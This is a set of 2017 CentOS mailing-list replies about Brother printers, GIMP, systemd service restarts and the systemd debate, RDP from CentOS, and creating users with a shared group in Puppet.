Another vote for Brother printer Linux support, an MFC8510DN (and we haven't had issues with it either). - Original Message - From: "Fred Smith"To: "centos" Sent: Tuesday, July 11, 2017 11:34:05 PM Subject: Re: [CentOS] getting rid of hp c3180 On Tue, Jul 11, 2017 at 04:09:15PM -0700, John R Pierce wrote: > On 7/11/2017 3:58 PM, Fred Smith wrote: > >I faced the same issue some years ago, and found a low-priced mono > >laser that lated me quite a few years. no color, but few thing I > >wanted to print actually demanded color. > > my last two laser printers have been Brother black all-in-ones > ("MFC"). *VERY* cheap per page printing costs, even if you use > Brother brand toner cartridges. They make useful copy machines, > they are fast (22 page per minute, very short first page warmup). > The newer one we now have does double sided scanning, and double > sided printing. Both of these are ethernet/network printers. > decent linux support for printing. the scanner function can direct > email scans in PDF or JPG format, so there's no need for linux > drivers for scanning. I can second the Brother printers. My original one (HL-2070N) was supported well by one of the free printer drivers already available on Linux. More recently we have a MFC that works great with the Brother drivers for Linux. -- --- Under no circumstances will I ever purchase anything offered to me as the result of an unsolicited e-mail message. Nor will I forward chain letters, petitions, mass mailings, or virus warnings to large numbers of others. This is my contribution to the survival of the online community. --Roger Ebert, December, 1996 - The Boulder Pledge - ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Extreme frustration with GIMP
Well, I mis-spoke, Ctrl-Z can undo some things, not others. Sorry. - Original Message - From: "Leroy Tennison" <le...@datavoiceint.com> To: "centos" <centos@centos.org> Sent: Friday, July 7, 2017 12:38:17 PM Subject: Re: [CentOS] Extreme frustration with GIMP I saw Fred's later reply and am glad someone knew how to do it. I feel your pain, the gimp documentation isn't always the best. If you aren't already aware, when your work is suddenly undone, remember that Ctrl-Z (UnDo) is your friend. I found that I had to look for gimp tutorials on the web wherever I could and use the one that worked (as you discovered - not all do). And then there were cases where, like you did, posting on a forum produced far better results than hours of web search. - Original Message - From: "Alice Wonder" <al...@domblogger.net> To: "centos" <centos@centos.org> Sent: Friday, July 7, 2017 11:42:01 AM Subject: [CentOS] Extreme frustration with GIMP I am not a graphics person. Also can't afford to hire one. Trying to follow instructions at https://docs.gimp.org/en/gimp-tutorial-quickie-separate.html I use the "intelligent scissors" just like they say, spend quite a bit of effort doing so. Then click the foreground select tool - just like they say - and suddenly everything I did with the intelligent tool is undone. WTF? Does anyone know of an actual GIMP tutorial for removing background that doesn't cause me to throw a damn brick through my monitor? Photoshop makes it easy, but clearly GIMP developers have a completely different philosophy on how a graphics tool should work and I can't figure out what their philosophy is. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Extreme frustration with GIMP
I saw Fred's later reply and am glad someone knew how to do it. I feel your pain, the gimp documentation isn't always the best. If you aren't already aware, when your work is suddenly undone, remember that Ctrl-Z (UnDo) is your friend. I found that I had to look for gimp tutorials on the web wherever I could and use the one that worked (as you discovered - not all do). And then there were cases where, like you did, posting on a forum produced far better results than hours of web search. - Original Message - From: "Alice Wonder"To: "centos" Sent: Friday, July 7, 2017 11:42:01 AM Subject: [CentOS] Extreme frustration with GIMP I am not a graphics person. Also can't afford to hire one. Trying to follow instructions at https://docs.gimp.org/en/gimp-tutorial-quickie-separate.html I use the "intelligent scissors" just like they say, spend quite a bit of effort doing so. Then click the foreground select tool - just like they say - and suddenly everything I did with the intelligent tool is undone. WTF? Does anyone know of an actual GIMP tutorial for removing background that doesn't cause me to throw a damn brick through my monitor? Photoshop makes it easy, but clearly GIMP developers have a completely different philosophy on how a graphics tool should work and I can't figure out what their philosophy is. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] systemd services and Restart?
Although not on CentOS, I've been forced to use it with serial-getty@.service (even after enabling and starting it) to get the OS to display a console prompt after an OS upgrade. In this case I used Restart=on-success and RestartSec=5 (the latter an arbitrary value) because agetty exited after the first console disconnect. - Original Message - From: "James Pearson"To: "centos" Sent: Wednesday, June 28, 2017 7:54:43 AM Subject: [CentOS] systemd services and Restart? I've been trying out the Restart= option in some of my own systemd service unit files - which appears to work fine However, I notice that this option is only used in a few OS provided service unit files - and was wondering about the wisdom of adding this capability to other daemons/services? (e.g. chronyd or ntpd, crond, rpcbind, etc, etc) - not that these daemons are likely to crash and need restarting that often ... Previously, I've used custom scripts to monitor the state of key daemons and restart or report their status as appropriate - but as systemd has 'Restart' and 'OnFailure' capabilities build in, these options could potentially make (my) life a bit easier ... Are there any potential pit-falls in using Restart with OS provided daemons/services? Thanks James Pearson ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] RDP for Centos 7
One thing I've had to do in Windows (in addition to the firewall change) is uncheck "Allow connections only from computers running Remote Desktop with Network Level Authentication" (in System->Remote). - Original Message - From: "Scott Robbins"To: "centos" Sent: Thursday, June 22, 2017 12:13:54 PM Subject: Re: [CentOS] RDP for Centos 7 On Thu, Jun 22, 2017 at 05:48:57PM +0100, Rehabilitation Village Farms Coop wrote: > Pls can someone tell me how to setup rdp and how it is used. Is there any > step by step guide. Thank you There's not much to it. It's the remote desktop protocol that you use to access Windows servers. On Windows you open port 3387 or allow RDP in some other way. (I do almost no Windows, so I don't remember exactly, but I think on servers, there's something in the Windows firewall that you can allow.) You then install freerdp. There are other things that will work, but this is keeping it simple. This site gives a brief explanation. https://www.server-world.info/en/note?os=CentOS_7=x=5 You should be able to google for something like use CentOS-6 (or 7) connect to Windows RDP and find various tutorials. -- Scott Robbins PGP keyID EB3467D6 ( 1B48 077D 66F6 9DB0 FDC2 A409 FA54 EB34 67D6 ) gpg --keyserver pgp.mit.edu --recv-keys EB3467D6 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] C7, systemd, say what?!
I was sorely tempted to post saying I would initiate an empty email to the list in a week with subject systemd and see what the response would be - I'll refrain... - Original Message - From: "m roth"To: "centos" Sent: Thursday, June 8, 2017 9:32:57 AM Subject: Re: [CentOS] C7, systemd, say what?! Mark Haney wrote: > On 06/08/2017 09:12 AM, Andrew Holway wrote: >> I think we had enough of Systemd flaming last month. Please stop >> polluting my inbox and find an operating system compatible with your >> worldview. It is really tiresome to keep on hearing about it. >> > Huh. Okay, though I'm not sure when you became arbiter of this list. If > you don't like 'our worldview' discussions, maybe you need to find a > different OS that suits your childish attitude. Like Windows 95. > > Mailing lists now are so full of children it's hard to even use them. > Maybe you should leave IT if heated discussions make you uncomfortable. Folks, I'm the one who made the original annoyed throwaway remark. I've even asked that we end the incipient flamewar. Look, as much as I dislike systemd, going on and on and on just ain't of interest. Hell, I'll probably skim and delete, or just delete. Now, the information that someone posted about what might be happening to cause my original question was helpful, and in *that* context, in the same email, cmts about systemd, sure. But I dunno 'bout most of you, but a flamewar that runs for *weeks*, as we've seen here, is of no interest. Maybe we need another mailing list, like alt.religion.editors*, we could have alt.religion.systemd mark * vi, not emacs! Nya ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] PUPPET - group IDS
I'm not familiar with the syntax you're using but the below worked for me using 'puppet apply grp-usr.pp' on my laptop where grp-usr.pp contained: group { 'poc': ensure => present, gid => '1002' } user { 'one': ensure => present, uid => '1005', gid => '1002', require => Group['poc'] } user { 'two': ensure => present, uid => '1006', gid => '1002', require => Group['poc'] } The run produced no errors and grep poc /etc/group produced: poc:x:1002: with egrep 'one|two' /etc/passwd producing (with a couple of extraneous entries): nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin whoopsie:x:109:116::/nonexistent:/bin/false two:x:1006:1002::/home/two: one:x:1005:1002::/home/one: - Original Message - From: "Paul Heinlein"To: "centos" Sent: Wednesday, April 19, 2017 4:20:08 PM Subject: Re: [CentOS] PUPPET - group IDS On Wed, 19 Apr 2017, Ian Diddams wrote: > hope thus comes under the remit of this mailking list... > > > > We use puppet, and Im trying to come up with "code" that will create two user > accounts with a shared groiup ID > eg > user1 with UID 1000user 2 with UID 1001 > but I would like them BOTH to share the GID of 2000 > I've tried the following > accounts::groups: jointgroup: gid: '2000' > accounts::users: > user1: uid: '1000' gid: '2000' home: '/home/user1' > shell: '/bin/bash' password: '' > user2: uid: '1001' gid: '200' home: '/home/user2' > shell: '/bin/bash' password: '' > But when I trfy and use this puppet agent -tv complains when trying to create > user2 that GID 2000 is slready used . > > how may I manage this? I haven't used the "allowdupe" option, so I don't know if it works for GIDs, but supposedly this works: user { 'user1': uid => 1000, gid => 2000, ..., allowdupe => true } user { 'user2': uid => 1001, gid => 2000, ..., allowdupe => true } In YAML-ese, I guess you'd just add accounts::users: user1: allowdupe: 'true' -- Paul Heinlein <> heinl...@madboa.com <> http://www.madboa.com/ ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] humor (was Re: OT: systemd Poll)
Speaking of vi, I'm amazed at just how powerful it is. (And I'm not being sarcastic, there's not much I've searched for in regard to its capabilities that I haven't found). No thread drift here... - Original Message - From: "m roth"To: "centos" Sent: Wednesday, April 12, 2017 1:08:25 PM Subject: Re: [CentOS] humor (was Re: OT: systemd Poll) Andrew Holway wrote: >> >> Of course, to be fair, there may have been a *reason* for not doing it >> that way before >> > Between the early 1990's and early 2000's the price of a GB of memory went > from ~$100,000 to ~$1000*. I guess a lot of the design decisions made for > things like init were focussed on this. In 1995 is was common for server > platforms to have 32Mb ram whereas the kernel alone in my PC here at home > is consuming just over 500MB. It seems reasonable that software components > built in 1997 will not be fit for purpose in 2017. > > * According to perfunctory google search: > http://www.statisticbrain.com/average-historic-price-of-ram/ a) I was speaking in much more general terms than just software. b) Stuff built then will run unbelievable fast on modern systems - and no, in the nineties, we were not manually swapping. c) If it fulfils its intended purpose, why would you redefine it as not fit for that purpose? d) And then there stuff that I'm not sure of the purpose... like eclipse, that needs 2GB to run... for an editor. mark "my web pages proudly built in vi!" ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] OT: systemd Poll
Why don't we discuss something ***less*** controversial, like politics or religion? - Original Message - From: "Karanbir Singh"To: "centos" Sent: Wednesday, April 12, 2017 6:19:43 AM Subject: Re: [CentOS] OT: systemd Poll On 09/04/17 05:39, Anthony K wrote: > So, at which stage are you in w/ regards to adopting systemd? Are you > still ridiculing it, violently opposed to it, or have you mellowed to it? I think the points been made, can we all move along and let this thread be. -- Karanbir Singh +44-207-0999389 | http://www.karan.org/ | twitter.com/kbsingh GnuPG Key : http://www.karan.org/publickey.asc ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] OT: systemd Poll
Interesting that you should cite Stallman because freedom is an issue here, we've been reduced to Microsoft when it comes to init. We've lost most of our flexibility with no option to choose piecemeal what we want and don't want. - Original Message - From: "Andrew Holway"To: "centos" Sent: Tuesday, April 11, 2017 9:50:02 AM Subject: Re: [CentOS] OT: systemd Poll > > I'd much rather have a bash script to look at-- and manually step through. Is that a joke? Bash is an almighty impenetrable nightmare. I've been doing *nix for nearly 10 years and *still* am unable to read anything vaguely complicated in bash whereas I can write fairly decent python after 6 months. From my point of view SystemD is amazing I can write a 6 line service file for my apps and it *just works* and I don't have to think about it anymore. What is it about SystemD that brings out the Richard Stallman in everyone? ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] OT: systemd Poll
Interesting, I'm going to have to look into this. - Original Message - From: "Jonathan Billings" <billi...@negate.org> To: "centos" <centos@centos.org> Sent: Tuesday, April 11, 2017 8:32:49 AM Subject: Re: [CentOS] OT: systemd Poll On Tue, Apr 11, 2017 at 08:02:56AM -0500, Leroy Tennison wrote: > This does concern me, another post referred to the heavy-handed way > in which systemd has been implemented and I totally agree. "You > will conform" - no exceptions. What I fear is that we will lose the > ability to control the name, MAC address association at some future > point because "no one needs to do that" (speaking from their ivory > tower). To be honest, if you use systemd-networkd (instead of NM or the network init script), you can arbitrarily name your interfaces whatever you want, in a much more configuration-management-friendly way. It's just that systemd-networkd isn't that well-known yet. I'm on the fence about whether I like it or not. It is nice that its really simple files and consistent across distros, but it doesn't yet do stuff like wifi well. Also, most GNOME desktops have a NM applet that gets confused if you're using systemd-networkd. I still feel like systemd-networkd is a lot less convoluted than NetworkManager. https://www.freedesktop.org/software/systemd/man/systemd-networkd.service.html -- Jonathan Billings <billi...@negate.org> ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] OT: systemd Poll
Another huge concern: It breaks, someone else has to fix it because it's in the C source - after it reaches a high enough priority. At least with scripts you could conceivably hack it. From what I've read there is some ability to get systemd to defer to a script, I'm going to have to become an expert at that. - Original Message - From: "Bruce Ferrell"To: "centos" Sent: Monday, April 10, 2017 7:13:55 PM Subject: Re: [CentOS] OT: systemd Poll On 04/10/2017 03:20 PM, Pete Biggs wrote: >> I must admit that I skipped through the first and second stages - I >> never found creating init scripts a joy and instead opted to write my >> own scripts that I launched via inittab. As such, I welcomed the >> simplicity systemd's service files without fuss. >> >> So, at which stage are you in w/ regards to adopting systemd? Are you >> still ridiculing it, violently opposed to it, or have you mellowed to it? >> > It is what it is. > > I can see that systemd may not look as straightforward as init scripts, > but it has been clear for a while that SysVinit is generally not really > fit-for-purpose. Things like the mystic incantations embedded in > comments at the top to try and make chkconfig work properly, or the > lack of a consistent approach to configuring parameters (are they > embedded in the script? In /etc/sysconfig? The package's own config > files?). > > The fact that there was at one point multiple solutions to the problem > (with systemd eventually becoming the accepted one) and that no dev is > really going to voluntarily go through the pain and abuse of > implementing something new like this shows that it really was thought > to be necessary. > > I think what is/was the issue is the abrasive way that some of it was > done. It seems to have put people's backs up no end and makes them > predisposed to find fault with it. > > It's just different, that's all. It does the job it was designed to do. > It even copes with legacy init scripts, so you can still use them if > you want. > > And I remember when these new fangled init scripts first appeared - boy > did everyone find them confusing and hated them. > > P. > My first *IX system had only /etc/inittab and I had to manually add and configure inetd. Next generation used the bsd init system... Monolithic. No process start/stop, but I understood it. Then SystemV came along; Individual processes could be started, stopped, and queried. The came the function file and THAT was a complete mess... Every distro developer had his own idea of what functions were needed. In all three of those cases, there was a single, simple start up entity. That was the literal binary program init. It read /etc/inittab and used that to handle process management and those management processes were completely transparent. Standardized, well known locations were used. It was considered to be a not just good practice, but excellent practice to do so. It wasn't commonly done, but it was relatively simple to swap between them too. The current crop of system initialization systems, do everything possible to obscure the details of operation... Boot status on the console? Nope, obscured. Processes logged to standard places? Nope, someone might hijack the logs (we had a technique for that... remote logging, but that isn't important enough to make work... Too much trouble). The bottom line seems to be, "I've looked at this, and I know better than 20, 30 years of experience, so throw it all out and do it my way"... And if things get broken in the process... Oh well, that's progress. I've had my init system lose communication with the desktop gui and decide to reboot my system. Yes, systemd did that. dbus got an upgrade and was restarting so systemd rebooted my system. While not directly a systemd problem, I've haddistro builds of apache that didn't work because of some patch "needed" so systemd could manage apache (We need systemd hooked so deeply into every process now?!). Yes, each of these was corrected... But they didn't need to happen and NEVER happened with earlier init systems. The concepts in upstart, launchd, and systemd are mildly interesting to me and probably more so to others. The implementations of the ideas have been poorly thought out and tested. They cause so much trouble for me as to make them worthless to me. When complaints are registered, the response has often been "if we don't force it, it will never be tested". Completely unacceptable. This is MY issue with the new shiny toy. Heedless and needless system breakage by an escaped lab rat. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos